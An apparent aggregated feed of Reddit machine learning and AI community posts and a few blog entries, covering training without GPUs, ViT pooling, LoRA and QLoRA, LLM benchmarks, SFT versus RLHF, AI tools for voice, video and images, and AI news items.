    [R] Cloud computing and other GPU alternatives
I’m kind of new to the world of machine/deep learning, so cut me some slack here, but I was wondering about the best ways to train models (in my case a transformer) without a GPU. I personally don’t even have a PC; I’ve been using a 2017 MacBook Air. I know deep learning models are quite computationally expensive, so since I don’t have access to a GPU, how do I train models? I’ve read about cloud computing services like AWS, Google Colab, etc., but I was wondering what the best method was. Ideally free or as cheap as possible. submitted by /u/Present_Network1959 [link] [comments]  ( 9 min )
    [D] Beta Test Invitation: Free AI Email Chrome Extension
We are currently conducting a beta test for our Chrome extension and we value external input. Our platform allows you to write and receive your Gmail emails within the browser. You can also use AI to generate emails, without ever touching Gmail or ChatGPT. If you're interested in participating, please feel free to message or comment! submitted by /u/Live-Orange-8414 [link] [comments]  ( 9 min )
Do Vision Transformers have anything equivalent to pooling in CNNs? [Discussion]
I have a regression model based on a CNN that works reasonably well with fewer than 1M parameters. I am trying to check how a Vision Transformer (ViT) will perform on this task, but due to the lack of pooling in ViT, the model size is considerably larger (~10M parameters). Does ViT have anything equivalent to pooling to reduce the number of parameters? If not, that restricts ViT's applicability to large models on large datasets only. For smaller tasks with small datasets, CNNs or ResNets are far more computationally efficient. Or am I missing something? submitted by /u/Apprehensive-War8915 [link] [comments]  ( 9 min )
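One common workaround (a sketch with hypothetical shapes, not a claim about any particular ViT implementation) is to pool the patch tokens, either globally before the head or spatially between stages, much like pooling in a CNN:

```python
import numpy as np

# Hypothetical shapes: 196 patch tokens (a 14x14 grid) of dimension 384.
tokens = np.random.rand(196, 384)

# Global average pooling over the token axis -- the ViT analogue of the
# global pooling used before a CNN's classification head.
pooled = tokens.mean(axis=0)          # shape: (384,)

# Coarser spatial pooling: merge each 2x2 neighbourhood of the 14x14
# patch grid, quartering the sequence length for subsequent layers.
grid = tokens.reshape(14, 14, 384)
merged = grid.reshape(7, 2, 7, 2, 384).mean(axis=(1, 3)).reshape(49, 384)
```

Pooling the tokens shrinks the classifier head and the per-layer sequence length, though it does not by itself reduce the attention blocks' parameter count.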
    [D] How long does it take to setup an MLOps pipeline?
For our R&D team, we spent over a month trying to set up our pipeline. After R&D, we spend at least another 5 days putting a model into production, without the required data pipelines that connect our model to the service. The infrastructure to maintain and manage model training also takes around 2 weeks to build. Currently, our best solution is to offload the training process by purchasing a GPU and keeping it in the office. submitted by /u/potanees [link] [comments]  ( 9 min )
    [R] Weights Reset implicit regularization
Hi everyone! I want to share some interesting observations indicating that a very simple periodic weight-resetting procedure can serve as an implicit regularization strategy for training DL models. This technique also shows a potential connection with the Double Descent phenomenon. Here's the GitHub link: https://github.com/amcircle/weights-reset. As a co-author of this study, I must apologize in advance for its brevity. However, I sincerely hope it may prove useful to some. I would gladly respond to your queries and receive your criticism. Your personal experiences with anything similar would also be highly appreciated. submitted by /u/gregorivy [link] [comments]  ( 9 min )
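For readers who want the gist without the paper, the reset step can be sketched in a few lines (the hyperparameters here are made up for illustration; see the linked repo for the actual method):

```python
import numpy as np

rng = np.random.default_rng(0)

def reset_weights(w, fraction=0.1, init_std=0.02, rng=rng):
    """Re-initialize a random fraction of the entries of a weight matrix.

    A toy version of a periodic weight-reset step; in a real training
    loop this would be applied to selected layers every K epochs.
    """
    mask = rng.random(w.shape) < fraction          # entries to reset
    fresh = rng.normal(0.0, init_std, size=w.shape)
    return np.where(mask, fresh, w), mask

w = np.ones((64, 64))
w_new, mask = reset_weights(w, fraction=0.25)
```

Untouched entries keep their trained values, while the reset entries are redrawn from the initialization distribution.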
    [D] Training process - Are text encodings used along with image encodings
Hi, I am going through research papers and noticed that most of them discuss the text-conditioned image generation process (the reverse diffusion process): the text and time encodings are added as additional channels to the UNet block. However, I am curious whether text encodings are used during the training process as well. Is there a preview available of the datasets used in training, or a code snippet that shows the forward part of the training loop? Thanks submitted by /u/kaskoraja [link] [comments]  ( 9 min )
    [D] Benchmark for autoregressive LLM embedding quality for retrieval?
Hi everyone, There has been a lot of work on benchmarking autoregressive LLMs, such as the HF LLM Leaderboard, but I have not seen much work specifically on the relevance of such LLMs for retrieval. There is a lot of talk about chat over your own knowledge with solutions like llama_index, where LLMs both provide embeddings and answer based on the most similar content, but the embedding model and the answer-generation model need not be the same LLM. I saw the Massive Text Embedding Benchmark (MTEB), but it does not seem to contain much information about recent autoregressive LLMs. Are recent autoregressive LLMs, e.g. Llama 2, actually performing better than bidirectional models such as BERT? Because if so, all the recent fancy chat-with-your-documents projects could use much smaller models for embedding extraction and retrieval, and just call a fancy autoregressive LLM such as GPT-4 for answer synthesis. submitted by /u/Separate-Still3770 [link] [comments]  ( 9 min )
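The decoupling the poster describes is easy to see in code: retrieval only needs embeddings plus a similarity search, so the embedder can be any small encoder (a toy sketch with made-up 2-d embeddings):

```python
import numpy as np

def cosine_top_k(query, docs, k=2):
    """Return indices of the k document embeddings most similar to the query.

    The embeddings could come from a small bidirectional encoder, while a
    separate large autoregressive model only synthesizes the final answer.
    """
    q = query / np.linalg.norm(query)
    d = docs / np.linalg.norm(docs, axis=1, keepdims=True)
    scores = d @ q                       # cosine similarities
    return np.argsort(-scores)[:k]       # best-scoring first

docs = np.array([[1.0, 0.0], [0.0, 1.0], [0.7, 0.7]])
idx = cosine_top_k(np.array([1.0, 0.1]), docs, k=2)
```

Nothing in the retrieval step depends on which model later generates the answer.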
[D] [R] Open-source model that can caption an image of a chart?
Hi, I'm looking for an open-source model that can take an image of an infographic, such as a pie chart or graph, and provide a description of the information in that chart: for example, the values of the x and y axes and their labels, and whether the chart is increasing or decreasing. I've worked with image-captioning models such as BLIP before, as I have used them in projects involving Stable Diffusion, but such models don't give specifics about the information in the graph, just a brief overview. I know researchers have worked on this problem in the past using the VisText dataset: https://news.mit.edu/2023/researchers-chart-captions-ai-vistext-0630 So far I'm thinking it may come down to fine-tuning BLIP or an equivalent to specialize on infographics. Thoughts? submitted by /u/UncleSammmm [link] [comments]  ( 9 min )
    [P] Any existing photo/video classifier UIs with custom labels?
    I have a significant amount of files that I would like to label for future reference. I've looked at software such as Photoprism or Librephoto which have object classification but they are based on a static model. I'd like something where I could label a few photos then generate similar matches where I can approve the good matches for reinforcement learning. I'm pretty sure I saw a demo like this at a code conference using Azure but I'm hoping for something self-hosted to avoid API fees. I was exploring coding something to do this for me but I don't want to put in the work if something with a UI exists already. This seemed like the best place to ask. submitted by /u/MZZXX [link] [comments]  ( 9 min )
[D] Best way to run a PyTorch model on a cropped version of a video on someone else's PC?
Hi - I have trained a PyTorch model that does some fairly simple object classification. The goal is to distribute it as part of an app that will pull information from a user's video. The videos are typically ~25-30 minutes and about 1GB in size, and only a 600x600px square at the bottom right of the video is needed for the classification (it's a minimap in a video game). The app is Electron-based. Ideally I want to input a video and extract the labels from the cropped section once per second. My current attempt involves converting the model to a TensorFlow.js model, rendering the video in a <video> element, drawing it to a <canvas> stretched so only the minimap is visible, running the model, saving the labels, increasing the current time of the video by 1 second, and repeating until the video is done. This seems like a terrible plan, but it's much better than the couple of other ideas I've tried (using ffmpeg to extract a frame every second, for example). Any advice appreciated! Edit: just to clarify, this will only ever be run on Windows submitted by /u/FreddoRS [link] [comments]  ( 9 min )
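Whichever route the OP takes, the crop geometry and sampling schedule are the same; a minimal sketch (frame size and duration are made-up examples). As an alternative to the canvas approach, something like `ffmpeg -i in.mp4 -vf "fps=1,crop=600:600:iw-600:ih-600" f%05d.png` should extract one bottom-right crop per second.

```python
def minimap_box(frame_w, frame_h, size=600):
    """Pixel box (left, top, right, bottom) of a size x size square
    anchored at the bottom-right corner of the frame, where the minimap sits."""
    return (frame_w - size, frame_h - size, frame_w, frame_h)

def sample_times(duration_s, step_s=1.0):
    """Timestamps (in seconds) at which to grab one frame per step."""
    return [i * step_s for i in range(int(duration_s // step_s))]

box = minimap_box(1920, 1080)   # example 1080p frame
times = sample_times(5.0)       # example 5-second clip
```

Pre-cropping before inference also means the model only ever sees 600x600 inputs, regardless of the source resolution.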
[R][P] Review to two/three-word summarization | Text tagging
Hello, I'm looking for a model (probably two models) that would: summarize reviews (e.g. website reviews) down to two or three words, then reuse these words or "review tokens" to tag reviews with similar content. Then, if a review's content differs (e.g. cosine similarity of 0.2), another tag will be generated from the diverging review. Is there anything like this on the "market"? submitted by /u/BartPetersyn [link] [comments]  ( 9 min )
    [D] Spectrum of Specialization in ML
Hello to everyone reading this. I am just about to finish Andrew Ng's 3-course ML Specialization, and I have also had 2 courses on ML in my Business Intelligence Analytics studies at uni. Now I am extremely interested in ML, but I see there is a wide spectrum of different subfields you can focus on. I need to get into the job market as fast as possible. So can anyone guide me on which aspect of ML I should give most of my time to, in order to practice and build a portfolio that would translate well to interviews and hiring? Thank you submitted by /u/JaguarMoosa [link] [comments]  ( 9 min )
    [D] Question Difficulty Predictor
How would you proceed on a project assessing the difficulty level of a question? I tried using readability metrics like the Flesch-Kincaid score, etc., but those did not yield proper results. Is there a good method I could use? Also, how could I assess the "readability" of a question, or in other words, how easy it is to understand what the question is asking. submitted by /u/uglyboi34 [link] [comments]  ( 9 min )
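For reference, the Flesch-Kincaid grade level is just a linear formula over word, sentence, and syllable counts, which is part of why it says little about conceptual difficulty (the counts below are made-up inputs; a real pipeline also needs a tokenizer and a syllable estimator, where most of the noise comes from):

```python
def flesch_kincaid_grade(words, sentences, syllables):
    """Flesch-Kincaid grade level computed from raw counts."""
    return 0.39 * (words / sentences) + 11.8 * (syllables / words) - 15.59

# Example: 100 words in 5 sentences with 140 syllables.
grade = flesch_kincaid_grade(words=100, sentences=5, syllables=140)
```

Because it only sees surface statistics, a short question about quantum field theory can score as "easier" than a long question about lunch plans.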
    [R]eleasing a new model for conditional music generation
Hey y'all, this is a model I have been independently building for some time. It uses parts of OpenAI's Jukebox and HarmonAI's Dance Diffusion model. Overall it is a hierarchical latent diffusion model and generates complete linked musical phrases at good quality. More information as well as examples can be found here: https://medium.com/@jeffsontagmusic/jukebox-diffusion-cbe22ff3cd47 Thanks! submitted by /u/jmoso13 [link] [comments]  ( 9 min )
    [D] How to stay on the cutting edge of applied ML/AI while doing my PhD?
A lot of my PhD work will use different types of ML/NN approaches to characterize problems in my field. It's kind of weird, since in my undergrad I came from a more traditional science background where we researched off papers written 2-20 years ago. Since a lot of these architectures are updating so fast, I wanted to see if there's a good way to keep up with the latest information so my work won't be outdated by the time I publish. Is there a general workflow that those of you in the field follow in this regard? submitted by /u/This-Is-My-20th-Acc [link] [comments]  ( 9 min )
    A blog on LoRA and QLoRA finetuning techniques [P]
    Hey everyone, I wrote a blog on LoRA and QLoRA. Hope it helps you in understanding the theory behind them 🤗 https://medium.com/@gitlostmurali/understanding-lora-and-qlora-the-powerhouses-of-efficient-finetuning-in-large-language-models-7ac1adf6c0cf If the above one is behind paywall, you can visit the blog here (https://gitlostmurali.com/machine-learning/data-science/lora-qlora) submitted by /u/Outlandish_MurMan [link] [comments]  ( 8 min )
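As a companion to the blog, the core LoRA idea fits in a few lines: freeze W and train only a low-rank pair (B, A), so the adapted layer behaves like W + (alpha/r)·BA. The Gaussian init of A and zero init of B follow the original LoRA paper; the shapes and values below are an illustrative sketch:

```python
import numpy as np

rng = np.random.default_rng(0)

d, r = 512, 8                        # model dim, adapter rank (r << d)
W = rng.normal(size=(d, d))          # frozen pretrained weight
A = rng.normal(size=(r, d)) * 0.01   # trainable down-projection (Gaussian init)
B = np.zeros((d, r))                 # trainable up-projection (zero init)

def lora_forward(x, alpha=16.0):
    # Frozen path plus scaled low-rank update; equivalent to using
    # W_eff = W + (alpha / r) * B @ A, but without materializing W_eff.
    return x @ W.T + (alpha / r) * (x @ A.T) @ B.T

x = rng.normal(size=(1, d))
y = lora_forward(x)
```

At initialization B is zero, so the adapted layer reproduces the frozen model exactly, and only 2·r·d parameters (here 8,192 vs. 262,144 in W) are trained.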
    [D] I’m losing my voice due to illness, and I’m looking for ML/AI solution
    Hey all, like the title says, I’m losing my voice due to an illness (Parkinson’s disease), and I would like to create an AI voice using recordings from 10 years ago. I used to be a prolific podcaster, and I have about 50 episodes of podcasts that I can use as input. Is this possible? What service or software can I use? My voice is beyond repair since Parkinson’s is a progressive disease. An AI voice would allow me to work and would open up new doors for me. Thank you! submitted by /u/NWMoney101 [link] [comments]  ( 9 min )
    [P] Candle: Torch Replacement in Rust
Candle is a minimalist ML framework for Rust. Some of its features:
• Examples of popular models: Whisper, Llama 2, Falcon, Bert, Starcoder
• WASM support, so you can run the models directly in the browser
• User-defined kernels, so you can use Flash Attention
• Similar syntax to PyTorch
• Data loaders
• Transformer utilities
submitted by /u/hackerllama [link] [comments]  ( 9 min )
    [D] How to keep my ML skills whilst on another job?
    Hey all, I have a technical background, having studied engineering and ML at one of the world's leading universities. I really enjoyed it and did well, but long story short, since graduating (coming to 2 years) I have been working in a Family Office, doing things I don't feel are very related. I wanted to know what kind of things I can do to keep myself in the loop and continue developing my ML/DS skills in my spare time. Alternatively, ideas of projects I could have just to make sure I have a portfolio? submitted by /u/thegreatudini [link] [comments]  ( 9 min )
[P] MMLU-by-Task Evaluation Results for 500+ Open Source Models
    Typically, research papers and leaderboards only report the overall score on Measuring Massive Multitask Language Understanding (MMLU) and not per task performance. Hugging Face recently released detailed evaluation data that includes per task performance. I made a sortable leaderboard here https://huggingface.co/spaces/CoreyMorris/MMLU-by-task-Leaderboard . You can also make custom scatter plots on the site so you can explore the relationship between parameter count and performance. submitted by /u/corey1505 [link] [comments]  ( 9 min )
    [D] Current trends in explainability?
I've realized my technical understanding of explainability is a few years behind, having last focused on it with LIME and SHAP. Does anyone have a survey reference they like for recent trends and updates in ML explainability? submitted by /u/balcell [link] [comments]  ( 8 min )
    [R] What's the current research status of "SFT with high-quality data" vs RLHF?
    At first, with InstructGPT and ChatGPT, it looked like RLHF was the holy grail to successfully finetune LLMs on human preferences. Then, from May 2023 onwards, a trend of doing just SFT with high-quality data showed up (e.g. "LIMA: Less Is More for Alignment" https://arxiv.org/abs/2305.11206) as an alternative to doing RLHF. What's your opinion on these two narratives? Is RLHF likely to still be relevant even in the presence of SFT with high-quality data? submitted by /u/bornot2b [link] [comments]  ( 9 min )
    [Discussion] What has your experience been as someone joining ML from a lateral field?
Hi all, I am currently working in ML research at a big-name medical research center. Our main focus is the application of ML methods to stroke diagnostics and treatment. Now, I am quite happy working here, but my background is somewhat interdisciplinary. I have a bachelor's in life science and a master's in bioinformatics. Because of this I always feel like I have to catch up to my colleagues when it comes to ML, and in part also computer science knowledge. It feels like there are a million things to learn and many small details to know that I am not even sure how to look up. I am curious what your experience has been if you were/are in a similar situation? How did you manage to catch up? submitted by /u/JuicyLambda [link] [comments]  ( 9 min )
    [D] Does SOTA performance on object detection seem low to anybody else?
Either I'm too new to the space, or I'm stating the obvious, but it seems that object detection performance is really low. The current SOTA is 66% on COCO test-dev, which doesn't match how well AI seems to be performing in self-driving cars, surveillance tech, and elsewhere. Am I missing something? submitted by /u/philipkd [link] [comments]  ( 9 min )
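Part of the answer is the metric itself: COCO's headline number is box mAP averaged over IoU thresholds from 0.50 to 0.95, which penalizes slightly misplaced boxes that would be harmless in practice, so it is not comparable to accuracy-style scores. A minimal IoU computation (made-up boxes) shows how strict the matching is:

```python
def iou(box_a, box_b):
    """Intersection-over-union of two axis-aligned (x1, y1, x2, y2) boxes."""
    ax1, ay1, ax2, ay2 = box_a
    bx1, by1, bx2, by2 = box_b
    iw = max(0.0, min(ax2, bx2) - max(ax1, bx1))   # overlap width
    ih = max(0.0, min(ay2, by2) - max(ay1, by1))   # overlap height
    inter = iw * ih
    union = (ax2 - ax1) * (ay2 - ay1) + (bx2 - bx1) * (by2 - by1) - inter
    return inter / union if union > 0 else 0.0

# Two 10x10 boxes shifted by half their width: IoU is only 25/175, about 0.14,
# so this pair would fail even the loosest COCO threshold of 0.50.
score = iou((0, 0, 10, 10), (5, 5, 15, 15))
```

A detector can localize "pretty well" by eye and still score poorly under this averaging.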
    [R] Hierarchical Representation and Propagation of Wavefunctions within Gaussian Basis Functions
    I. Introduction This paper aims to provide an in-depth explanation of representing and propagating wavefunctions in a hierarchical manner using Gaussian basis functions. Wavefunctions are mathematical descriptions of the quantum states of physical systems and are fundamental to quantum mechanics. However, representing complex wavefunctions for real-world quantum systems remains a key challenge. This paper proposes using multiple layers of Gaussian basis functions, with trainable amplitudes, to represent wavefunctions in a hierarchical fashion and enable wavefunction propagation between layers. Understanding wavefunction representation and propagation has significant implications in diverse fields like quantum computing, quantum chemistry, and materials science. Efficient wavefunction man…  ( 12 min )
    Evol-Instruct Dataset Creation [R] [D]
I’ve been researching the Evol-Instruct datasets for a few days now and have decided I want to build my own out for a specific use case. I’ve read literally everything possible, admittedly not much exists outside of WizardLM and Georgia Tech, but I’ve read it. I was hoping to discuss it here with smarter people. I see this as a way to use LLMs to generate great datasets. However, my use case doesn’t really exist in any models yet, not thoroughly enough to produce a good Evol-Instruct set. So, I’m going to do that tomorrow. I’m going to use TheBloke’s WizardCoder-Guanaco 15B GPTQ version to train on my specific dataset: about 10GB of clean, really strong data I’ve spent 3-4 weeks putting together. In theory, I’ll use the Evol-Instruct script from WizardLM to generate the new dataset, and then I’ll apply that to whatever model I decide to use. There is a good chance I train my own on the general Evol-Instruct datasets available now, likely quite a large one. I’m looking for any tips, discussion, ideas, and thoughts from the community. Cheers! submitted by /u/LoadingALIAS [link] [comments]  ( 9 min )
    I made this film completely using AI! From Chat GPT to EbSynth!
    submitted by /u/RMIII3 [link] [comments]  ( 8 min )
    This video argues that artificial intelligence should not be regulated.
    submitted by /u/antaloaalonso [link] [comments]  ( 8 min )
    Catching up on the weird world of LLMs
    submitted by /u/nangaparbat [link] [comments]  ( 8 min )
    AI Service to unblur a slightly blurry Passport?
    All services I found made the blurry text even worse. Is there any which has good results for documents? submitted by /u/_SarahB_ [link] [comments]  ( 8 min )
    A whole sitcom I Made using AI Art & Voice. Entertainment is on its way back to the hands of the Independent creator
    submitted by /u/SoundRedux [link] [comments]  ( 8 min )
    I've developed a tool to convert voice notes into structured text: seeking your valuable feedback and suggestions!
Hi there 👋, I'm excited to share a project I've been working on over the past few months! My primary goal is to create a service that will be beneficial for people. Please share your thoughts on this idea, and suggest any new features you think I should implement! Exciting features: • Speak to Write: with this feature, you can speak your thoughts or information and the tool will transcribe it into text. The best part? You can then forward the transcribed text to any application with just one click. • Audio to Action Plan: the service can transform a received audio message into a structured list of elements or bullet points. This feature is especially useful for outlining an action plan or item list. • Speak in any Language: you can dictate an audio message in your native language, and the service will translate it into any other language, maintaining high translation quality, significantly better than Google Translate. • Meeting Transcripts & Summaries: the service is perfect for converting recorded audio from meetings into text and generating concise summaries. It supports the upload of users' files. Thank you for taking the time to check it out. I look forward to hearing your feedback. You can access the service by visiting this link: https://audionotes.ai submitted by /u/OneMoreSuperUser [link] [comments]  ( 9 min )
    Are there are any *good* image gen AI APIs?
    I have a killer project idea but it requires fully custom image generation. Character portraits. Any API like that out there? submitted by /u/thedarklord176 [link] [comments]  ( 8 min )
    Is there AI that browses a website, checks the structure of the content of the page and then writes a script for me that extracts the data regularly?
    I just want a script to perform the task not AI itself so that I have something reliable. It always puzzles me why these things don't instantly pop up as services where I don't have to worry about even deploying the script (but that's another issue). submitted by /u/VLADIMIROVIC_L [link] [comments]  ( 8 min )
    Nvidia, Hugging Face collaboration on DGX...noice!
    submitted by /u/Internet0fGames [link] [comments]  ( 8 min )
GPT-4 chose a female character for YouTube, named AI Ada as a reference to Ada Lovelace, the first woman programmer, in order to pay homage to the vital role women have played, and continue to play, in the fields of technology and AI. Quite awesome!
    submitted by /u/stefanbg92 [link] [comments]  ( 8 min )
    ChatGPT for Beginners: How to Create Images
    Tutorial about creating images using ChatGPT. submitted by /u/SplitYOLO [link] [comments]  ( 8 min )
Video editing AI
Hello, I'm currently editing videos using CapCut, which is not ideal. I'm looking for an AI that ideally: finds me B-roll according to what I say, cuts "bad takes" out, adds good "TikTok-style" captions, and enhances audio. Do you guys know anything like this? Thank you! submitted by /u/Orlandostyler [link] [comments]  ( 8 min )
    Spotify AI
    I've been using this today whilst I've been working and I found it pretty comical at first with the voice that talks to you, but now I'm starting to love it! I want it to talk more when it does talk. It feels like a nice break in the music to have the AI talk like a radio host. I'm sure some people would rather that not being a feature (if they use it at all), but I'd love for it to have some more comedic one-liners, possible news updates, and potentially traffic updates based on location and if it knows you're driving. Would be awesome! It's also a really good tool for if you want to listen to music you've not heard before. Whether it's part of your usual genre or not. Looking forward to seeing how this progresses! submitted by /u/Columbian_Toad [link] [comments]  ( 9 min )
    Generative AI: An Artist's Honest Perspective
    Hi everyone. I am an artist. And programmer, and kind of a bit of everything. But what is important, is that I was an artist before the current "generative AI" was a thing, and I have been drawing, digitally and traditionally alike for like... a decade? Art, to me, is getting what is inside your head, and presenting it to others outside of your consciousness and thoughts. It's showing the world a piece of your interpretation, your experience, your impressions of the world you inhabit. It's about communicating to others your emotions, your ideas, your thoughts and feelings. Not everyone can draw, or paint, or sculpt. I could say "learn it, it's easy", but that would be a lie. It isn't easy. It is years upon years of constant, hard work, requiring focus and dedication, and a passion for l…  ( 11 min )
    Allen Institute for AI takes new approach to managing AI risks and promoting transparency
    submitted by /u/DarronFeldstein [link] [comments]  ( 8 min )
    How do I make AI-generated videos with prompts?
    How do I make AI-generated videos with prompts for free? submitted by /u/DankDude6T9 [link] [comments]  ( 8 min )
    I'm making my first AI game.
Hello AI enthusiasts! I'm a software engineer passionate about AI, and recently I've been experimenting with making my first AI game. In the game, you try to negotiate the price of a watch down with an AI-driven salesman, who rewards (or roasts, lol) you depending on your bargaining skills. I’d be more than happy to get your thoughts and feedback on this idea; it's the first application I've built using AI, so any tips would be much appreciated! Thanks! submitted by /u/gavo_gavo [link] [comments]  ( 9 min )
    Sod Off, Human! AI's Magic Revealed!
    submitted by /u/ispeakout [link] [comments]  ( 8 min )
    A body-positive nonprofit replaced staff with an AI chatbot – the move backfired
    submitted by /u/intengineering [link] [comments]  ( 8 min )
    Is there an AI for reviewing videos based on audience category?
    I want to start making a YouTube channel, because I've got a passion project I want to work on with a Minecraft modpack. Obviously, Minecraft is a HUGE game and has thousands of videos posted every day... This is why I want to know if there is an AI that can rate videos based on editing, audience engagement, sound, etc... Also giving areas of improvement and the strengths of the video. Probably a big ask and SO far fetched, but there's always a chance of something being out there. submitted by /u/Columbian_Toad [link] [comments]  ( 9 min )
AI photo editor recommendations
Can someone recommend a great AI photo editor that can take 100 profile photos and standardise them, i.e. crop so the head is the same size across all photos, with the background removed and replaced with a standard background? submitted by /u/Woodger [link] [comments]  ( 8 min )
    Sorry Jarvis
https://preview.redd.it/9epla7xjdugb1.png?width=960&format=png&auto=webp&s=92190970027b08476ac9899a42d7099fe67cf5aa submitted by /u/Maxie445 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/7/2023
    Data analytics company Qureight has entered into a multi-year strategic research collaboration with AstraZeneca that will use AI models to accelerate research into lung diseases.[1] Zoom’s terms of service update establishes the video platform’s right to use some customer data for training its AI models.[2] Cigna, one of the country’s largest health insurance companies, faces a class action lawsuit over charges that it illegally used an AI algorithm to deny hundreds of thousands of claims without a physician’s review.[3] Japan plans guidelines for AI-savvy human resources.[4] Sources: [1] https://www.digitalhealth.net/2023/08/qureight-collaborates-with-astrazeneca-for-ai-lung-disease-research/ [2] https://www.cnbc.com/2023/08/07/zoom-ai-tools-trained-using-some-customer-data.html [3] https://www.medicaleconomics.com/view/cigna-using-ai-to-reject-claims-lawsuit-charges [4] https://asianews.network/japan-plans-guidelines-for-ai-savvy-human-resources/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Ai generated trailer for horror film “Magic 8”
    submitted by /u/SellowYubmarine [link] [comments]  ( 8 min )
    AdaTape: Foundation model with adaptive computation and dynamic read-and-write
    Posted by Fuzhao Xue, Research Intern, and Mostafa Dehghani, Research Scientist, Google Adaptive computation refers to the ability of a machine learning system to adjust its behavior in response to changes in the environment. While conventional neural networks have a fixed function and computation capacity, i.e., they spend the same number of FLOPs for processing different inputs, a model with adaptive and dynamic computation modulates the computational budget it dedicates to processing each input, depending on the complexity of the input. Adaptive computation in neural networks is appealing for two key reasons. First, the mechanism that introduces adaptivity provides an inductive bias that can play a key role in solving some challenging tasks. For instance, enabling different num…  ( 93 min )
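The input-dependent budget can be illustrated with a toy example (a fixed-point iteration, not AdaTape's actual tape-token mechanism, which appends a variable number of tape tokens per input): easy inputs near the solution stop early, while hard inputs spend more steps.

```python
import math

def adaptive_refine(x, tol=1e-6, max_steps=50):
    """Iterate x <- cos(x) until the update is smaller than tol; the
    number of steps taken (the 'compute budget') depends on the input."""
    for step in range(1, max_steps + 1):
        nxt = math.cos(x)
        if abs(nxt - x) < tol:
            return nxt, step
        x = nxt
    return x, max_steps

_, easy_steps = adaptive_refine(0.739085)  # already near the fixed point of cos
_, hard_steps = adaptive_refine(3.0)       # far from it
```

A fixed-computation model would spend `max_steps` on every input; the adaptive version modulates its budget per input, which is the property the article describes.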
    Growing Bonsai Networks with RNNs
    submitted by /u/Ameobea [link] [comments]  ( 8 min )
    I made an animated video explaining Effective Accelerationism (aka e/acc), a philosophical movement related to AI that has recently grown a lot in popularity and offers a path to a post-scarcity technological utopia. It has even been endorsed by Marc Andreessen and Garry Tan.
    submitted by /u/antaloaalonso [link] [comments]  ( 8 min )
    Getting the Hang of OpenCV’s Inner Workings with ChatGPT
Very interesting blog post from the OpenCV.ai team about how ChatGPT can be used for code development and debugging. Introduction from the article: As programmers, we often work with familiar development environments, but occasionally we encounter new tools that can be time-consuming and challenging to learn. In such situations, having virtual assistance can be extremely beneficial. In this article, I will share my experience of contributing to OpenCV, a renowned open-source library, despite having limited knowledge of C++ and its architecture. I achieved this with the assistance of ChatGPT, a Large Language Model (LLM). I hope you find it interesting. More details are here. submitted by /u/No-Independence5880 [link] [comments]  ( 9 min )
    Mixture of Experts (MoE)
    submitted by /u/ABDULKADER90H [link] [comments]  ( 8 min )
    Studying RL is hard
I want to study Reinforcement Learning, but the concepts are really hard and mathematical. Whenever I think I grasp something, I forget it the next day completely. The basic concepts of MDPs are the only thing I think I've understood. But I can't understand the training algorithms like SARSA, Q-learning, and DQN, or their implementations. I am really frustrated and overwhelmed. Does anyone know some good resources for understanding the concepts and implementations of RL? submitted by /u/Menium [link] [comments]  ( 9 min )
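It sometimes helps to see that the scary-looking update rules are one line of arithmetic. A single toy Q-learning update (made-up states and values), with the SARSA difference noted in a comment:

```python
# Textbook rule: Q(s,a) += alpha * (r + gamma * max_a' Q(s',a') - Q(s,a))
alpha, gamma = 0.5, 0.9
Q = {('s0', 'right'): 0.0, ('s1', 'right'): 1.0, ('s1', 'left'): 0.0}

s, a, r, s_next = 's0', 'right', 0.0, 's1'
best_next = max(Q[(s_next, b)] for b in ('left', 'right'))  # off-policy max
Q[(s, a)] += alpha * (r + gamma * best_next - Q[(s, a)])
# SARSA is identical except it uses Q[(s_next, a_next)] for the action the
# policy actually chose next, instead of the max (on-policy vs off-policy).
```

DQN is the same rule again, with the table replaced by a neural network trained to regress the bracketed target.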
    Is it necessary to run "episodes" in model-free learning?
In Q-learning (image), episodes are run, in the sense that the states are visited in the order they appear as part of one sequence in an episode. In Dyna-Q (image) (which is, by the way, described as being the same as Q-learning when the planning portion is deleted), there doesn't seem to be any iteration over the states of an episode. It just picks a state, applies the ε-greedy policy to choose the action, learns, updates the model, then plans. Would Q-learning also work fine if we got rid of the "episodes" and just picked isolated state-action pairs? Thank you submitted by /u/AstronautVarious3791 [link] [comments]  ( 9 min )
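On the question itself: Dyna-Q's planning updates do exactly that, sampling isolated, previously observed (s, a) pairs from the learned model with no episode ordering. A stripped-down sketch (one action per state, made-up rewards; a full agent would interleave real-experience updates):

```python
import random

random.seed(0)
alpha, gamma = 0.1, 0.9
Q = {}
# Learned model: (state, action) -> (reward, next_state). 's1' self-loops
# with reward 1, so its value should head toward 1 / (1 - gamma) = 10.
model = {('s0', 'a'): (0.0, 's1'), ('s1', 'a'): (1.0, 's1')}

for _ in range(500):
    s, a = random.choice(list(model))        # isolated state-action pair
    r, s_next = model[(s, a)]
    best = Q.get((s_next, 'a'), 0.0)         # only one action in this toy
    Q[(s, a)] = Q.get((s, a), 0.0) + alpha * (r + gamma * best - Q.get((s, a), 0.0))
```

Values still propagate between states through the bootstrapped target, even though no episode is ever replayed in order; coverage of the state-action space is what matters, not the visiting order.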
    Intuition about what features deep RL learns?
I know that for image recognition there is a rough intuition that a neural network's lower layers learn low-level features like edges, and the higher layers learn more complex compositions of the lower-layer features. Is there a similar intuition about what a value network or policy network learns in deep RL? If there are any papers that investigate this, that would be helpful. submitted by /u/Turkeydunk [link] [comments]  ( 9 min )
    Productive constraints
    This post will discuss two scripting languages, but that’s not what the post is really about. It’s really about expressiveness and (or versus) productivity. *** I was excited to discover the awk programming language sometime in college because I had not used a scripting language before. Compared to C, awk was high-level luxury. Then a […] Productive constraints first appeared on John D. Cook.  ( 6 min )
    Möbius transformations over a finite field
A Möbius transformation is a function of the form f(z) = (az + b)/(cz + d), where ad – bc = 1. We usually think of z as a complex number, but it doesn’t have to be. We could define Möbius transformations in any context where we can multiply, add, and divide, i.e. over any field. In particular, we could work over […] Möbius transformations over a finite field first appeared on John D. Cook.  ( 6 min )
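Concretely, the only ingredient needed for division in GF(p) is the modular inverse, so a Möbius transformation over a finite field is a few lines (a sketch that ignores the point at infinity, which arises when cz + d ≡ 0 mod p and needs separate handling):

```python
def mobius(a, b, c, d, z, p):
    """Evaluate (a*z + b) / (c*z + d) over GF(p), assuming c*z + d != 0 mod p."""
    num = (a * z + b) % p
    den = (c * z + d) % p
    return (num * pow(den, -1, p)) % p   # pow(x, -1, p): inverse mod p (Python 3.8+)

# Example over GF(7) with ad - bc = 1: a=2, b=3, c=1, d=2 (2*2 - 3*1 = 1).
w = mobius(2, 3, 1, 2, 4, 7)
```

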